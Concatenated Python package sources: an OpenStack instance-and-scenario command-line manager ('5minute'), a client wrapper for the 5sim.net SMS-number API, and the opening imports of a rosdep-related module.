""" Disbale decorator for catch exception. """
def __enter__(self):
global DISABLE_CATCH
DISABLE_CATCH = True
def __exit__(self, type, value, traceback):
global DISABLE_CATCH
DISABLE_CATCH = False
def get_FQDN_from_IP(ip):
# If we want to support old version of OpenStack, we have to update this function and
# solve it via serviceman
return "host-{1}-{2}-{3}.host.centralci.eng.rdu2.redhat.com".format(*ip.split("."))
# -----------------------------------------------------------
# Classes
# -----------------------------------------------------------
class BaseClass(object):
__nova = None
__keystone = None
__cinder = None
__heat = None
__token = None
__neutron = None
__first_check = False
__tmpconf = "/tmp/5minute.conf"
__profiles = "profiles/"
_scenarios = "./vminute/scenarios/"
__check_env_done = False
@catch_exception(
"The configuration file ~/.5minute/config does not exist.\n"
"Please download the OpenStack RC file from OpenStack WebUI (Access & Security > API Access "
"> Download OpenStack RC file) and save it to ~/.5minute/config.\n")
def __load_configuration(self):
if not os.path.isfile(self.__tmpconf):
subprocess.check_call("source {config_loc}/config; env | grep OS_ >> {tmpfile}"
.format(config_loc=CONF_DIR, tmpfile=self.__tmpconf), shell=True)
lines = []
with open(os.path.expanduser(self.__tmpconf), "r") as fd:
lines = fd.readlines()
rx2 = re.compile(r'^\s*([A-z_]*)="?([^"]*)"?\s*$')
for it in lines:
res = rx2.search(it)
if res:
key, value = res.groups()
os.environ[key] = value.strip()
def __checkenv(self):
if self.__check_env_done:
return
if not os.environ.get('OS_AUTH_URL') or \
not os.environ.get('OS_TENANT_NAME') or \
not os.environ.get('OS_USERNAME') or \
not os.environ.get('OS_PASSWORD'):
if not self.__first_check:
self.__load_configuration()
self.__first_check = True
self.__checkenv()
else:
die("The configuration file %s/config doesn't contain all important variables.\n" % CONF_DIR)
self.__profiles = "%s/%s" % (CONF_DIR, self.__profiles)
if not os.path.isdir(os.path.expanduser(self.__profiles)):
try:
os.makedirs(os.path.expanduser(self.__profiles))
except OSError:
die("The problem with creating of folder '%s'." % self.__profiles)
self.__scenarios = "%s/%s" % (CONF_DIR, self.__scenarios)
if not os.path.isdir(os.path.expanduser(self.__scenarios)):
try:
os.makedirs(os.path.expanduser(self.__scenarios))
except OSError:
die("The problem with creating of folder '%s'." % self.__scenarios)
self.__check_env_done = True
@catch_exception("Your SSL pub-key is not yet uploaded on the server. "
"Please use: 5minute key ~/.ssh/id_dsa.pub")
def _check_key(self):
self.nova.keypairs.get(USER)
@catch_exception("Problem with connection to OpenStack. Please, check the configuration file "
"~/.5minute/config. (maybe OS_PASSWORD is not explicite value or is not set up in env)")
def __check_connection(self):
try:
self.__nova.authenticate()
except Exception as ex:
os.remove(self.__tmpconf)
raise ex
def __get_cinder(self):
if not self.__cinder:
self.__checkenv()
self.__cinder = cinder_client.Client(1,
os.environ.get('OS_USERNAME'),
os.environ.get('OS_PASSWORD'),
os.environ.get('OS_TENANT_NAME'),
os.environ.get('OS_AUTH_URL'))
return self.__cinder
def __get_heat(self):
if not self.__heat:
self.__checkenv()
endpoint = self.__get_endpoint('orchestration')
self.__heat = heat_client.Client(1, endpoint=endpoint, token=self.token)
return self.__heat
def __get_keystone(self):
if not self.__keystone:
self.__checkenv()
self.__keystone = keystone_client.Client(username=os.environ.get('OS_USERNAME'),
password=os.environ.get('OS_PASSWORD'),
tenant_name=os.environ.get('OS_TENANT_NAME'),
auth_url=os.environ.get('OS_AUTH_URL'))
return self.__keystone
def __get_nova(self):
if self.__nova:
return self.__nova
self.__checkenv()
self.__nova = nova_client.Client(2,
username=os.environ.get('OS_USERNAME'),
api_key=os.environ.get('OS_PASSWORD'),
project_id=os.environ.get('OS_TENANT_NAME'),
auth_url=os.environ.get('OS_AUTH_URL'))
self.__check_connection()
return self.__nova
def __get_token(self):
if not self.__token:
self.__checkenv()
auth = keystoneIdentity.Password(username=os.environ.get('OS_USERNAME'),
password=os.environ.get('OS_PASSWORD'),
tenant_name=os.environ.get('OS_TENANT_NAME'),
auth_url=os.environ.get('OS_AUTH_URL'))
session = keystoneSession.Session(auth=auth)
self.__token = auth.get_token(session)
return self.__token
def __get_neutron(self):
if not self.__neutron:
self.__checkenv()
endpoint = self.__get_endpoint('network')
self.__neutron = neutron_client.Client('2.0', endpoint_url=endpoint, token=self.token)
return self.__neutron
def __get_endpoint(self, name):
endpoints = self.keystone.service_catalog.get_endpoints()
if name not in endpoints:
die("This endpoint '%s' is not known" % name)
return endpoints.get(name)[0]['publicURL']
def __getattr__(self, name):
if name == 'cinder':
return self.__get_cinder()
elif name == 'heat':
return self.__get_heat()
elif name == 'nova':
return self.__get_nova()
elif name == 'keystone':
return self.__get_keystone()
elif name == 'token':
return self.__get_token()
elif name == 'neutron':
return self.__get_neutron()
return None
@catch_exception("The problem with parsing of profile XML file. ")
def __get_scenario(self, filename):
xml = None
try:
xml = urllib2.urlopen('https://example.com/scenarios/%s' % filename).read()
except:
warning("This profile '%s' doesn't exist." % filename)
return dict()
return xmltodict.parse(xml)
def cmd(self, argv):
self.help()
def help(self):
print """
Usage: 5minute <-d|--debug> [COMMAND]
Manager for your openstack machines.
OPTIONS:
-d, --debug - enable debugging mode.
COMMANDS:
help - this help
key - upload your SSL key on the server
images - the list of accessible images
flavor - the list of flavors
list - the list of instances
delete - delete a quest
boot - create a new quest
scenario - working with scenarios
Examples:
5minute help
5minute key ~/.ssh/id_dsa.pub
5minute images
5minute images -h
5minute images --all
5minute images satellite
5minute flavor
5minute list
5minute list --all
5minute list satellite
5minute boot --help
5minute boot 5minute-RHEL6
5minute boot --name myRHEL6 5minute-RHEL6
5minute scenarios --help
"""
class KeyClass(BaseClass):
@catch_exception("The problem with uploading of public key.")
def __upload_key(self, key):
if not os.access(key, os.R_OK):
die("SSL key '%s' is not readable." % key)
with open(key) as fd:
self.nova.keypairs.create(USER, fd.read())
print "The key %s was successfully uploaded." % key
def cmd(self, argv):
if len(argv) == 0 or argv[0] in ('help', '--help', '-h'):
self.help()
else:
self.__upload_key(argv[0])
def help(self):
print """
Usage: 5minute key <SSL-PUB-KEY>
Upload your SSL key on the OpenStack server.
Examples:
5minute key ~/.ssh/id_dsa.pub
"""
class ImagesClass(BaseClass):
__filter = "5minute-"
@catch_exception("The problem getting list of images.")
def __images(self):
images = self.nova.images.list()
x = PrettyTable(["Name", "ID", "Status"])
x.align["Name"] = "l"
rx = re.compile(self.__filter, re.IGNORECASE)
for img in images:
if rx.search(img.name):
row = [img.name, img.id, img.status]
x.add_row(row)
print x.get_string(sortby="Name")
def cmd(self, argv):
if len(argv) > 0:
if argv[0] in ('help', '--help', '-h'):
self.help()
return 0
elif argv[0] in ('--all', '-a'):
self.__filter = ""
else:
self.__filter = argv[0]
self.__images()
def help(self):
print """
Usage: 5minute images [PARAM]
Show the list of accessible images. By default, it shows only 5minute images.
PARAM:
-a, --all show all accessible images
<REGEXP> we can use a regular expression for the filtering of the result
Examples:
5minute images
5minute images --all
5minute images satellite
5minute images fedora
"""
class FlavorClass(BaseClass):
@catch_exception("The problem getting list of flavors.")
def __flavors(self):
flavors = self.nova.flavors.list()
x = PrettyTable(["Name", "CPU", "RAM", "HDD", "ephemeral", "swap"])
x.align["Name"] = "l"
for flav in flavors:
row = [flav.name, flav.vcpus,
"%s MB" % flav.ram,
"%s GB" % flav.disk,
"%s GB" % flav.ephemeral,
"%s MB" % flav.swap if flav.swap else ""]
x.add_row(row)
print x
def cmd(self, argv):
if len(argv) > 0:
if argv[0] in ('help', '--help', '-h'):
self.help()
return 0
self.__flavors()
def help(self):
print """
Usage: 5minute flavors
Show the list of accessible flavors.
Examples:
5minute flavors
"""
class ServerClass(BaseClass):
@catch_exception("The instance doesn't exist.", nova_exceptions.NotFound)
@catch_exception("The name of the instance is ambiguous, please use ID.", nova_exceptions.NoUniqueMatch)
def get_instances(self, id):
if re.match(r'^[0-9a-f\-]+$', id) is None:
return self.nova.servers.find(name=id)
else:
return self.nova.servers.get(id)
@catch_exception("The image doesn't exist.", nova_exceptions.NotFound)
@catch_exception("The name of the image is ambiguous, please use ID.", nova_exceptions.NoUniqueMatch)
def get_image(self, id):
if re.match(r'^[0-9a-f\-]+$', id) is None:
return self.nova.images.find(name=id)
else:
return self.nova.images.get(id)
@catch_exception("The volume doesn't exist.", cinder_exceptions.NotFound)
@catch_exception("The name of the volume is ambiguous, please use ID.", cinder_exceptions.NoUniqueMatch)
def get_volume(self, id):
if re.match(r'^[0-9a-f\-]+$', id) is None:
return self.cinder.volumes.find(name=id)
else:
return self.cinder.volumes.get(id)
@catch_exception("The snapshot doesn't exist.")
def get_snapshot(self, id):
if re.match(r'^[0-9a-f\-]+$', id) is None:
return self.cinder.volume_snapshots.find(display_name=id)
else:
return self.cinder.volume_snapshots.get(id)
@catch_exception("The flavor doesn't exist.", nova_exceptions.NotFound)
@catch_exception("The flavor is ambiguous, please use ID.", nova_exceptions.NoUniqueMatch)
def get_flavor(self, id):
if re.match(r'^[0-9a-f\-]+$', id) is None:
return self.nova.flavors.find(name=id)
else:
return self.nova.flavors.get(id)
@catch_exception("The problem with getting of the list of networks.")
def get_networks(self, filter=None):
def test_net(net, filter):
if filter is None:
return True
for key, val in filter.items():
if isinstance(val, str):
if re.search(val, net.get(key, "")) is None:
return False
elif val != net.get(key):
return False
return True
res = list()
for net in self.neutron.list_networks()['networks']:
if test_net(net, filter) and len(net.get('subnets')) > 0:
res.append(net)
return res
def get_stable_private_network(self):
def get_count_free_ip(cidr, flist):
address_size = 32
ip_pool_mask = int(cidr.split("/")[1])
ip_pool_bit_size = address_size - ip_pool_mask
max_pool_size = 2 ** ip_pool_bit_size - 2
return max_pool_size - len([ip_addr for ip_addr in flist if
ip_addr.pool == cidr and ip_addr.instance_id])
nets = self.get_networks(filter={'name': "^default-", "router:external": False})
max_network_space = 0
current_biggest_network = None
flist = self.nova.floating_ips.list()
res = list()
for net in nets:
pub_net = self.__get_external_for_private_network(net)
if pub_net:
sub = self.neutron.list_subnets(id=net['subnets'].pop(0))
if len(sub.get('subnets')) > 0:
cidr = sub['subnets'][0]['cidr']
network_free_space = get_count_free_ip(cidr, flist)
if network_free_space > max_network_space:
max_network_space = network_free_space
res = list()
res.append({'private': net, 'free_ip': network_free_space, 'public': pub_net})
elif network_free_space > 0 and network_free_space == max_network_space:
res.append({'private': net, 'free_ip': network_free_space, 'public': pub_net})
return random.choice(res)
def __get_external_for_private_network(self, pnet):
"""
This function returns public network for private network,
if the router is present between these nets.
"""
ports = self.neutron.list_ports(network_id=pnet['id'], device_owner="network:router_interface").get('ports')
if len(ports) == 0:
return None
router = self.neutron.show_router(ports.pop(0)['device_id'])
return self.neutron.show_network(router['router']['external_gateway_info']['network_id'])['network']
def cmd(self, argv):
pass
def help(self):
pass
class ListInstancesClass(ServerClass):
"""
This is only view on the ServerClass for getting of list of instances.
"""
def cmd(self, argv):
filter = None
if len(argv) == 0:
filter = "%s-" % USER
else:
if argv[0] in ('help', '--help', '-h'):
self.help()
return 0
elif argv[0] not in ('--all', '-a'):
filter = argv[0]
self.list_instances(filter)
@catch_exception("The problem with getting of the list of instances.")
def list_instances(self, filter):
instances = self.nova.servers.list(search_opts={"name": filter})
x = PrettyTable(["Name", "ID", "Status", "FQDN"])
x.align["Name"] = "l"
x.align["FQDN"] = "l"
for ins in instances:
row = [ins.name, ins.id, ins.status, ins.metadata.get('fqdn', "")]
x.add_row(row)
print x.get_string(sortby="Name")
def help(self):
print """
Usage: 5minute list [PARAM]
Show the list of instances. By default, it shows only your instances.
PARAM:
-a, --all show all accessible instances
<REGEXP> we can use a regular expression for the filtering of the result
Examples:
5minute list
5minute list --all
5minute list satellite
5minute list fedora
"""
class DeleteInstanceClass(ServerClass):
"""
This is only view on the ServerClass for deletting of instance.
"""
def cmd(self, argv):
if len(argv) == 0:
die("Missing parameter. Please try 5minute delete <name|id>.")
else:
if argv[0] in ('help', '--help', '-h'):
self.help()
return 0
else:
self.kill_instances(argv[0])
# @catch_exception("The problem deleting of the instances.")
def kill_instances(self, id):
server = self.get_instances(id)
progress(title="Release floating IP:")
# This is stupid method for checking of lock, if it is activated
fips = self.nova.floating_ips.findall(instance_id=server.id)
for fip in fips:
server.remove_floating_ip(fip.ip)
progress(result="DONE")
vols = self.nova.volumes.get_server_volumes(server.id)
if len(vols) > 0:
progress(title="Release volumes:")
for vol in vols:
progress()
cvol = self.cinder.volumes.get(vol.id)
self.cinder.volumes.begin_detaching(cvol)
progress(result="DONE")
progress(title="Delete instance:")
done = False
try:
server.delete()
done = True
while len(self.nova.servers.findall(id=server.id)) > 0:
time.sleep(1)
progress()
progress(result="DONE")
except Exception as e:
if 'locked' in e.message:
progress(result="\x1b[31;01mLOCKED\x1b[39;49;00m")
else:
progress(result="FAIL")
for fip in fips:
if done:
self.nova.floating_ips.delete(fip.id)
else:
server.add_floating_ip(fip.ip)
for vol in vols:
cvol = self.cinder.volumes.get(vol.id)
if done:
progress(title="Delete volume:")
cvol.delete()
while len(self.cinder.volumes.findall(id=cvol.id)) > 0:
time.sleep(1)
progress()
progress(result="DONE")
else:
self.cinder.volumes.roll_detaching(cvol)
def help(self):
print """
Usage: 5minute (del|kill|delete) <NAME|ID>
Delete instance.
PARAM:
<NAME|ID> Name or ID of instance
Examples:
5minute delete 5minute-RHEL6
5minute kill 5minute-RHEL6
"""
class BootInstanceClass(ServerClass):
"""
This is only view on the ServerClass for booting of instance.
"""
ufile = ""
default_flavor = "m1.medium"
variables = None
created_volume = False
def __parse_params(self, opts, argv):
params = {}
for key, val in opts:
if key in ('--help', '-h') or 'help' in argv:
params['help'] = True
return params
elif key in ('--flavor', '-f'):
params['flavor'] = self.get_flavor(val)
elif key in ('--console', '-c'):
params['console'] = True
elif key in ('--name', '-n'):
params['name'] = "%s-%s" % (USER, val)
elif key in ('--volume', '-v'):
params['volume'] = val
elif key in ('--profile', '-p'):
params['profile'] = val
elif key == '--novolume':
params['novolume'] = True
elif key == '--noip':
params['noip'] = True
elif key == '--userdata':
params['userdata'] = val
else:
die("Bad parameter '%s'. Please try 5minute boot --help." % key)
if len(argv) != 1:
die("The name of image is ambiguous or empty.")
params['image'] = self.get_image(argv.pop(0))
self.add_variable('image', params['image'].name)
self.add_variable('image_id', params['image'].id)
if 'name' not in params:
params['name'] = "%s-%s" % (USER, params['image'].name)
self.add_variable('name', params['name'])
return params
@catch_exception("Bad parameter. Please try 5minute boot --help.")
def cmd(self, argv):
opts, argv = \
getopt.getopt(argv, "hcf:n:v:p:",
['help', 'console', 'flavor=', 'name=', 'volume=', 'userdata=',
'novolume', 'noip'])
self.params = self.__parse_params(opts, argv)
if 'help' in self.params:
self.help()
return 0
self.boot_instance()
def add_variable(self, key, val):
if not self.variables:
self.variables = dict()
self.variables[key] = val
def __release_resources(self):
if "floating-ip" in self.variables and \
self.variables.get("floating-ip"):
self.nova.floating_ips.delete(self.variables['floating-ip'])
if self.created_volume:
cvol = self.cinder.volumes.get(self.volume.id)
cvol.detach()
cvol.delete()
@catch_exception()
def boot_instance(self):
self._check_key()
with disable_catch_exception():
try:
self.__setup_networking()
self.__setup_volume(self.params['image'])
self.__setup_userdata_script(self.params['image'])
self.__choose_flavor(self.params['image'])
self.__create_instance(self.params['image'])
except Exception, ex:
self.__release_resources()
die(str(ex), exception=ex)
def help(self):
print """
Usage: 5minute boot [PARAM] <IMAGE-NAME|IMAGE-ID>
Boot new instance.
PARAM:
-n, --name name of the instance
-f, --flavor name of flavor
-v, --volume the volume snapshot (default: 5minute-satellite5-rpms)
--novolume no voluume snapshot
-c, --console display the console output during booting
--userdata the paths or URLs to cloud-init scripts
Examples:
5minute boot 5minute-RHEL6
"""
def __setup_networking(self):
progress(title='Chossing the private network:')
network = self.get_stable_private_network()
progress(result=network['private']['name'])
progress(title='Obtaining a floating IP:')
floating_ip = self.nova.floating_ips.create(network['public']['id'])
if not floating_ip:
raise Exception("The problem with getting of IP address.")
self.add_variable('floating-ip', floating_ip)
self.add_variable('private-net', network['private']['id'])
progress(result=floating_ip.ip)
progress(title='Obtaining a domain name:')
hostname = get_FQDN_from_IP(floating_ip.ip)
if not hostname:
raise Exception("The problem with getting of DNS record.")
self.add_variable('hostname', hostname)
progress(result=hostname)
# @catch_exception("The problem with downloading of the userdata script for this image")
def __setup_userdata_script(self, image):
res = None
filenames = None
if "userdata" in self.params:
filenames = self.params['userdata']
elif "cscripts" in image.metadata:
filenames = image.metadata['cscripts']
if filenames:
progress(title='Loading the userdata script:')
self.params['cscript'] = ""
for filename in filenames.split():
cscript = urllib.urlopen(filename).read()
self.params['cscript'] += cscript.format(**self.variables)
self.params['cscript'] += "\n"
progress(result="DONE")
def __setup_volume(self, image):
self.volume = None
if not self.params.get('novolume', False):
volume_name = self.params.get('volume')
if volume_name is None:
volume_name = image.metadata.get('volumes')
if volume_name:
# Is the volume_name name/id of existing volume?
try:
self.volume = self.get_volume(volume_name)
except cinder_exceptions.NotFound as ex:
pass
if self.volume is None:
# The volume_name is name of snapshot,
# we create new volume from it
self.volume = self.__create_new_volume(volume_name, image)
def __create_new_volume(self, volume_name, image):
progress(title="Creating a new volume:")
snap = self.get_snapshot(volume_name)
name = self.params.get('name', "%s-%s" % (USER, image.name))
vol = self.cinder.volumes.create(size=snap.size, snapshot_id=snap.id,
display_name=name)
while vol.status == 'creating':
progress()
time.sleep(1)
vol = self.get_volume(vol.id)
if vol.status == 'error':
raise Exception("The problem with creating of the volume.")
progress(result="DONE")
self.created_volume = True
return vol
def __choose_flavor(self, image):
progress(title="Used flavor:")
if 'flavor' not in self.params:
if 'default_flavor' in image.metadata:
self.params['flavor'] =\
self.get_flavor(image.metadata.get('default_flavor'))
if self.params.get('flavor') is None:
self.params['flavor'] =\
self.get_flavor(self.default_flavor)
flavor = ("{name} (RAM: {ram} MB, vCPU: {vcpus}, disk: {disk} GB)")\
.format(**self.params['flavor'].__dict__)
progress(result=flavor)
def __create_instance(self, image):
progress(title="Instance name:", result=self.params.get('name'))
progress("Creating a new instance:")
param_dict = {'name': self.params.get('name'),
'image': image.id,
'flavor': self.params.get('flavor').id,
'key_name': USER,
'nics': [{'net-id': self.variables['private-net']}],
'meta': {'fqdn': self.variables["hostname"]},
'security_group': ['satellite5'],
'config_drive': True}
if self.volume:
param_dict['block_device_mapping'] = {'vdb': self.volume.id}
# print(param_dict)
if "cscript" in self.params:
param_dict['userdata'] = self.params['cscript']
server = self.nova.servers.create(**param_dict)
status = server.status
while status == 'BUILD':
time.sleep(1)
progress()
status = self.nova.servers.get(server.id).status
# print server.progress
if status == 'ACTIVE':
progress(result="DONE")
else:
progress(result="FAIL")
if "floating-ip" in self.variables:
server.add_floating_ip(self.variables['floating-ip'])
self.__check_console_output(server)
def __check_console_output(self, server):
lindex = 0
show_output = self.params.get('console')
exit_status = None
exit_message = "DONE"
counter = 60
reg_login = re.compile(r".*login:\s*$")
reg_warning = re.compile(r"(warning)", re.I)
reg_error = re.compile(r"(error)", re.I)
if show_output:
print "Booting of the instance:"
else:
progress(title="Booting of the instance:")
output = server.get_console_output().splitlines()
while counter > 0 and exit_status is None:
nindex = len(output) - 1
if lindex >= nindex:
counter -= 1
else:
counter = 60
for line in output[lindex:]:
patern = "%s\n"
if reg_login.match(line):
counter = 0
if exit_status is None:
exit_status = True
break
if reg_warning.search(line):
patern = "\x1b[92;01m%s\x1b[39;49;00m\n"
if reg_error.search(line):
patern = "\x1b[31;01m%s\x1b[39;49;00m\n"
exit_message = "Errors in the userdata script"
if show_output:
sys.stdout.write(patern % line)
else:
progress()
time.sleep(1)
lindex = nindex + 1
if exit_status is None:
output = server.get_console_output(30).splitlines()
if not show_output:
progress(result=exit_message)
if exit_status is None:
exit_status = False
return exit_status
class ScenarioClass(ServerClass):
"""
This is class for scenarios
"""
@staticmethod
def getInstance(subcmd):
if subcmd == 'list':
return ListScenarioClass()
elif subcmd == 'templates':
return TemplateScenarioClass()
elif subcmd == 'boot':
return BootScenarioClass()
elif subcmd in ('del', 'delete', 'kill'):
return DeleteScenarioClass()
else:
return ScenarioClass()
def cmd(self, argv):
self.help()
return 0
@catch_exception("The scenario doesn't exist.", heat_exceptions.NotFound)
def get_scenario(self, id):
return self.heat.stacks.get(id)
def help(self):
print """
Usage: 5minute scenarios <COMMAND> [PARAM]
Managing scenaros
COMMAND:
help - show this help
templates - show the list of templates
list - show the list of scenarios
boot - create new scenario/stack
del|kill - delete scenario
Examples:
5minute scenarios help
5minute scenarios templates
5minute scenarios list
5minute scenarios boot template1
5minute scenarios boot --name myscenario template1
5minute scenarios del myscenario
"""
class TemplateScenarioClass(ScenarioClass):
def __get_list_templates(self):
templates = list()
folder = os.path.expanduser(self._scenarios)
for file in os.listdir(folder):
if file.endswith(".yaml"):
templates.append(re.sub(r'\.yaml$', '', file))
return templates
def cmd(self, argv):
if len(argv) > 0 and argv.pop(0) in ('help', '--help', '-h'):
self.help()
return 0
else:
x = PrettyTable(["Name", ])
x.align["Name"] = "l"
for row in self.__get_list_templates():
print row
x.add_row([row, ])
print x.get_string(sortby="Name")
def help(self):
print """
Usage: 5minute scenarios templates
Show the list of available templates
Examples:
5minute scenarios templates
"""
class BootScenarioClass(ScenarioClass):
@catch_exception("Bad parameter. Please try 5minute scenario boot --help.")
def cmd(self, argv):
params = dict()
opts, argv2 = getopt.getopt(argv, "n:h", ['name=', 'help'])
for key, val in opts:
if key in ('--help', '-h'):
self.help()
return
elif key in ('--name', '-n'):
params['name'] = val
else:
die("Bad parameter '%s'. Please try 5minute scenario boot --help." % key)
if len(argv2) != 1:
die("You have to set name of template. Please try 5minute scenario boot --help.")
template_name = argv2.pop(0)
if template_name == 'help':
self.help()
return
params['template_name'] = template_name
params['template'] = self.__get_template(template_name)
self._check_key()
self.__crate_stack(params)
@catch_exception("Error: Problem with the loading of the template.")
def __get_template(self, name):
template = None
with open(os.path.expanduser("{folder}/{template}.yaml".format(folder=self._scenarios,
template=name)), 'r') as tmd:
template = tmd.read()
return template
def __crate_stack(self, params):
progress(title="Creating of scenario:")
params['name'] = "%s-%s" % (USER, params['template_name'] if 'name' not in params else params['name'])
current_biggest_network, free_ips = self.get_network()
stack = self.heat.stacks.create(stack_name=params['name'], template=params['template'], parameters={
'key_name': USER,
'image': 'RHEL-6.5-Server-x86_64-released',
'flavor': 'm1.medium',
'public_net': current_biggest_network['id'],
'prefix_name': params['name'],
'private_net_cidr': '192.168.250.0/24',
'private_net_gateway': '192.168.250.1',
'private_net_pool_start': '192.168.250.10',
'private_net_pool_end': '192.168.250.250'
})
uid = stack['stack']['id']
stack = self.heat.stacks.get(stack_id=uid).to_dict()
while stack['stack_status'] == 'CREATE_IN_PROGRESS':
progress()
stack = self.heat.stacks.get(stack_id=uid).to_dict()
time.sleep(3)
if stack['stack_status'] == 'CREATE_COMPLETE':
progress(result="DONE")
for it in stack['outputs']:
print "{key}: {val}".format(key=it['output_key'], val=it['output_value'])
print "Stack succesfully created."
else:
progress(result="FAIL")
die("Stack fall to unknow status: {}".format(stack))
def __get_count_free_ip(self, net, flist):
address_size = 32
ip_pool_mask = int(net['name'].split("/")[1])
ip_pool_bit_size = address_size - ip_pool_mask
max_pool_size = 2 ** ip_pool_bit_size - 2
return max_pool_size - len([ip_addr for ip_addr in flist if
ip_addr.pool == net['name'] and ip_addr.instance_id])
def get_network(self):
max_network_space = 0
current_biggest_network = None
flist = self.nova.floating_ips.list()
for net in self.neutron.list_networks()['networks']:
if net.get('router:external') and len(net.get('subnets')) > 0:
network_free_space = self.__get_count_free_ip(net, flist)
if network_free_space > max_network_space:
max_network_space = network_free_space
current_biggest_network = net
return (current_biggest_network, max_network_space)
def help(self):
print """
Usage: 5minute scenarios boot [PARAM] <TEMPLATE-NAME>
Boot new scenaro
PARAM:
-n, --name Name of scenario
<TEMPLATE-NAME> The name of template
Examples:
5minute scenarios boot template1
5minute scenarios boot --name myscenario template1
"""
class ListScenarioClass(ScenarioClass):
def cmd(self, argv):
filter = None
if len(argv) == 0:
filter = "%s-" % USER
else:
if argv[0] in ('help', '--help', '-h'):
self.help()
return 0
elif argv[0] not in ('--all', '-a'):
filter = argv[0]
self.list_scenarios(filter)
@catch_exception("The problem with getting of the list of scenarios.")
def list_scenarios(self, filter):
scenarios = self.heat.stacks.list(search_opts={"name": filter})
x = PrettyTable(["Name", "ID", "Status", "Template"])
x.align["Name"] = "l"
x.align["Template"] = "l"
for ins in scenarios:
row = [ins.stack_name, ins.id, ins.stack_status, ins.description.split("\n", 1)[0][0:20]]
x.add_row(row)
print x.get_string(sortby="Name")
def help(self):
print """
Usage: 5minute scenarios list [PARAM]
Show the list of scenarios. By default, it shows only your scenarios.
PARAM:
-a, --all show all accessible scenarios
<REGEXP> we can use a regular expression for the filtering of the result
Examples:
5minute scenarios list
5minute scenarios list --all
5minute scenarios list satellite-infrastructure
"""
class DeleteScenarioClass(ScenarioClass):
"""
This is only view on the ServerClass for deletting of instance.
"""
def cmd(self, argv):
if len(argv) == 0:
die("Missing parameter. Please try 5minute scenario delete <name|id>.")
else:
if argv[0] in ('help', '--help', '-h'):
self.help()
return 0
else:
self.kill_scenario(argv[0])
@catch_exception("The problem with deleting of the scenario.")
def kill_scenario(self, id):
scenario = self.get_scenario(id)
scenario.delete()
def help(self):
print """
Usage: 5minute scenarios (del|kill|delete) <NAME|ID>
Delete scenario.
PARAM:
<NAME|ID> The name of the scenario
Examples:
5minute scenarios delete 5minute-RHEL6
5minute scenarios kill 5minute-RHEL6
"""
# -----------------------------------------------------------
# Manuals
# -----------------------------------------------------------
def main(argv):
if 'novaclient' not in sys.modules:
die("Please install python-novaclient (maybe 'yum -y install python-novaclient'?)")
if 'xmltodict' not in sys.modules:
die("Please install python-xmltodict (maybe 'yum -y install python-xmltodict'?)")
cmd = None
if len(argv) > 0:
cmd = argv.pop(0)
if cmd in ('--debug', '-d'):
global DEBUG
DEBUG = True
if len(argv) > 0:
cmd = argv.pop(0)
if cmd is None or cmd in ('help', '--help', '-h'):
BaseClass().cmd(argv)
elif cmd == 'key':
KeyClass().cmd(argv)
elif cmd == 'images':
ImagesClass().cmd(argv)
elif cmd == 'flavors':
FlavorClass().cmd(argv)
elif cmd == 'list':
ListInstancesClass().cmd(argv)
elif cmd in ('del', 'delete', 'kill'):
DeleteInstanceClass().cmd(argv)
elif cmd == 'boot':
BootInstanceClass().cmd(argv)
elif cmd in ('scenario', 'scenarios'):
scmd = None
if len(argv) > 0:
scmd = argv.pop(0)
ScenarioClass.getInstance(scmd).cmd(argv)
if __name__ == "__main__":
main(sys.argv[1:]) | 5minute | /5minute-0.2.1.tar.gz/5minute-0.2.1/vminute/vminute.py | vminute.py |
import requests
import json
from fivesim.errors import *
class FiveSim:
def __init__(self, api_key, proxy):
self.__api_key = api_key
self.__proxy = proxy
self.__session = requests.Session()
self.__auth_url: str = "https://5sim.net/v1/user/"
self.__guest_url: str = "https://5sim.net/v1/guest/"
self.__vendor_url: str = "https://5sim.net/v1/vendor/"
self.__session.headers = {
"Authorization": f"Bearer {self.__api_key}",
"Accept": "application/json"
}
def __request(self, method, url):
try:
if method == "GET":
resp = self.__session.get(url, proxies=self.__proxy)
if resp.status_code == 401:
raise ApiKeyInvalidError
if resp.status_code == 400:
raise BadRequests(resp.text)
if resp.text == "no free phones":
raise NoPhoneNumberError("No number in stock")
if resp.text == "not enough user balance":
raise LowBalanceError("Not enough balance")
try:
return json.loads(resp.text)
except json.JSONDecodeError:
return resp.text
except Exception as e:
raise e
def get_country_list(self) -> dict:
return self.__request("GET", f"{self.__guest_url}countries")
def product_requests(self, country: str, operator: str) -> dict:
return self.__request("GET", f"{self.__guest_url}products/{country}/{operator}")
def price_requests(self) -> dict:
return self.__request("GET", f"{self.__guest_url}prices")
def price_requests_by_country(self, country: str) -> dict:
return self.__request("GET", f"{self.__guest_url}prices?country={country}")
def price_requests_by_product(self, product: str) -> dict:
return self.__request("GET", f"{self.__guest_url}prices?product={product}")
def price_requests_by_country_and_product(self, country: str, product: str) -> dict:
return self.__request("GET", f"{self.__guest_url}prices?country={country}&product={product}")
def get_balance(self) -> dict:
return self.__request("GET", f"{self.__auth_url}profile")
def buy_number(self, country: str, operator: str, product: str) -> dict:
return self.__request("GET", f"{self.__auth_url}buy/activation/{country}/{operator}/{product}?ref=3b612d3c")
def buy_hosting_number(self, country: str, operator: str, product: str) -> dict:
return self.__request("GET", f"{self.__auth_url}buy/hosting/{country}/{operator}/{product}")
def rebuy_number(self, product: str, number: str) -> dict:
return self.__request("GET", f"{self.__auth_url}reuse/{product}/{number}")
def check_order(self, order_id: str) -> dict:
return self.__request("GET", f"{self.__auth_url}check/{order_id}")
def finish_order(self, order_id: str) -> dict:
return self.__request("GET", f"{self.__auth_url}finish/{order_id}")
def cancel_order(self, order_id: str) -> dict:
return self.__request("GET", f"{self.__auth_url}cancel/{order_id}")
def ban_order(self, order_id: str) -> dict:
return self.__request("GET", f"{self.__auth_url}ban/{order_id}")
def sms_inbox_list(self, order_id: str) -> dict:
return self.__request("GET", f"{self.__auth_url}sms/inbox/{order_id}")
def btc_and_ltc_rates(self, currency: str) -> dict:
return self.__request("GET", f"{self.__auth_url}payment/crypto/rates?currency={currency}")
def address_payment(self, currency: str) -> dict:
return self.__request("GET", f"{self.__auth_url}payment/crypto/getaddress?currency={currency}")
def get_notifications(self, lang: str) -> dict:
return self.__request("GET", f"{self.__guest_url}flash/{lang}")
def vendor_statics(self) -> dict:
return self.__request("GET", f"{self.__auth_url}vendor")
def wallet_reverse(self) -> dict:
return self.__request("GET", f"{self.__vendor_url}wallets") | 5sim-python | /5sim_python-1.0.3-py3-none-any.whl/fivesim/client.py | client.py |
from __future__ import print_function
import os
from subprocess import Popen, PIPE, CalledProcessError
from . import create_default_installer_context
from .lookup import RosdepLookup
from .platforms.debian import APT_INSTALLER
from .platforms.osx import BREW_INSTALLER
